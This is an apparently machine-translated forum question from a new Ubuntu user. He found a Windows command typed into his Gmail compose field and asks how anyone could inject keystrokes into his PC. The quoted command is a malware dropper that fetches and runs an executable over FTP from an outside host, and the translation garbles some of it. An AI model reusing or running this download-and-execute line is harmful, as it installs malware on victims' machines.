如何确定我的Linux计算机是否被黑客入侵？

我的家用PC通常是打开的，但显示器却关闭了。今天傍晚，我下班回家后，发现了一次看上去很像黑客尝试的事情：在我的浏览器中，我的Gmail已打开（就是我），但是它处于撰写模式，并且在TO字段中输入以下内容：


md / c echo open cCTeamFtp.yi.org 21 >> ik＆echo用户ccteam10 765824 >> ik＆echo二进制文件>> ik＆echo get svcnost.exe >> ik＆echo bye >> ik＆ftp -n -v -s：ik＆del ik＆svcnost.exe＆exit
echo您已拥有


对我来说，这就像Windows命令行代码，并且md的代码开头与Gmail处于撰写模式这一事实表明，有人试图运行cmd命令。我猜我很幸运，实际上我没有在这台PC上运行Windows，但是还有其他人可以运行。这是我第一次发生这样的事情。我不是Linux专家，并且当时我没有运行除Firefox之外的任何其他程序。

我绝对确定我没有写过这篇文章，而且没有人在物理上在我的电脑上。另外，我最近将自己的Google密码（以及所有其他密码）更改为vMA8ogd7bv之类的密码，所以我不认为有人入侵了我的Google帐户。

刚刚发生了什么？如果不是老太婆的老Windows计算机已经运行了多年恶意软件，而是最近安装了新的Ubuntu，有人会如何在我的计算机上敲击键盘？

更新：
让我解决一些问题要点和问题：


我在奥地利的乡下。我的WLAN路由器运行WPA2 / PSK和不在字典中的中等强度密码。必须是蛮力的，距离这里不到50米；它不太可能被黑客入侵。
我正在使用USB有线键盘，因此再也不太可能有人可以入侵它。
当时我没有使用计算机。我上班时只是在家里闲逛。这是一台安装在显示器上的台式计算机，因此我很少将其关闭。
这台计算机只有两个月的历史，只能运行Ubuntu，并且我没有使用奇怪的软件或访问奇怪的网站。主要是Stack Exchange，Gmail和报纸。没有游戏。 Ubuntu已设置为保持最新。
我不知道有任何VNC服务正在运行；我当然还没有安装或启用它。我也没有启动任何其他服务器。我不确定默认情况下是否在Ubuntu中运行任何计算机吗？
我知道Gmail帐户活动中的所有IP地址。我相当确定Google不是入门工具。
我找到了日志文件查看器，但不知道要查找什么。帮助吗？

我真正想知道的是，让我感到不安全的真正原因是：互联网上的任何人如何在我的机器上生成击键？我如何才能避免这种情况，而不必全神贯注呢？我不是Linux极客，而是父亲，对Windows已有20多年的困扰，对它感到厌倦。而且在上网的18多年中，我从未亲眼看到过任何黑客尝试，因此这对我来说是新的。